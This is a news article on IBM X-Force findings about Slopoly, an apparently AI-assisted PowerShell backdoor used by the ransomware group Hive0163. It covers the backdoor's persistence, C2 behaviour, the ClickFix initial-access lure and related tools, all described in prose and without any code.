Cybersecurity analysts recently highlighted a concerning development in the realm of cybercrime: the emergence of an artificial intelligence (AI)-generated malware known as Slopoly, utilized by a financially motivated threat group identified as Hive0163. This new malware not only signifies a troubling advancement in the sophistication of cyber threats but also raises questions about the evolving role of AI in digital crime.
Golo Mühr, a researcher from IBM X-Force, shared findings about Slopoly in a report with The Hacker News. He emphasized that while the malware remains relatively basic at this stage, it showcases the alarming potential for threat actors to leverage AI technology to create new malware frameworks quickly—far faster than traditional methods allowed. This shift emphasizes a transformative moment in cybercrime, where the barriers to entry for developing sophisticated attacks are diminishing due to advancements in technology.
Hive0163 is primarily known for its extortion tactics, engaging in large-scale data breaches and ransomware activities. This e-crime collective has been linked with an array of malicious tools, including notable names like NodeSnake, Interlock RAT, JunkFiction loader, and Interlock ransomware. These tools are indicative of a comprehensive approach to cyber operations where multiple methods are employed to achieve criminal objectives.
An analysis of Hive0163’s activities revealed a specific ransomware incident from early 2026, during which the group deployed Slopoly as part of a post-exploitation strategy. This use underscores the malware’s role in maintaining persistent access to compromised servers for extended periods—up to a week in this case. Such persistence is crucial for threat actors who aim to maximize their control over affected systems.
The discovery of Slopoly traces back to a PowerShell script likely deployed through a builder tool, which established a lasting presence on victim systems via a scheduled task called “Runtime Broker.” This PowerShell script appears to exhibit characteristics typical of development with a large language model (LLM); it contains elaborate comments, logging functions, and well-structured error handling. One particularly descriptive snippet refers to it as a “Polymorphic C2 Persistence Client,” suggesting its role within a command-and-control (C2) framework designed for remote management and execution of malicious commands.
However, Mühr cautioned that despite these characteristics, the script lacks advanced capabilities, which would allow it to modify its own code during execution. Instead, the builder tool used for Slopoly shows a more conventional approach, capable of creating new clients that have varying configuration values and function names—a standard practice among malware developers. This indicates that while AI may be involved in the development process, its current impact remains limited in terms of sophistication.
The PowerShell script functions as a backdoor, capable of sending periodic heartbeat messages containing system information to a C2 server at 30-second intervals. Additionally, it polls for commands every 50 seconds, executes them, and sends the outcome back to the server. However, the specific content of these commands remains undisclosed, leaving an air of uncertainty regarding the extent of potential damage inflicted by such attacks.
Furthermore, this attack employed a social engineering technique known as ClickFix, which seeks to deceive individuals into executing malicious PowerShell commands. This initial trick leads to the download of NodeSnake—a malware linked with Hive0163. NodeSnake’s role as a first-stage component is crucial, allowing it to run shell commands, maintain persistence, and retrieve more extensive malware frameworks, such as Interlock RAT, for execution.
Historically, Hive0163 has utilized ClickFix alongside malvertising to gain initial access. They also exploit relationships with initial access brokers like TA569 (known as SocGholish) and TAG-124 (associated with KongTuke and LandUpdate808) to facilitate their operations further. The viral nature of such tactics emphasizes the dynamic nature of the threat landscape.
Slopoly’s architecture is noteworthy as well; it integrates multiple programming languages including PowerShell, PHP, C/C++, Java, and JavaScript to ensure cross-platform operability across both Windows and Linux systems. Like NodeSnake, these tools communicate with remote servers to execute commands, establish SOCKS5 proxy tunnels, create reverse shells, and deploy additional payloads such as ransomware.
The rise of Slopoly coincides with a troubling trend in AI-assisted malware, which also encompasses other malware like VoidLink and PromptSpy. This trend indicates a shift in tactics where cybercriminals leverage AI to streamline malware creation, ultimately scaling their operations more effectively than ever before.
IBM X-Force articulated that the advent of AI-generated malware does not necessarily introduce a significantly more advanced technical threat. However, it does empower attackers, enabling them to develop and execute attacks with reduced overhead time and increased efficiency. The implications of this advancement are profound, raising alarms about the future of cybersecurity in an increasingly technologically adept criminal landscape.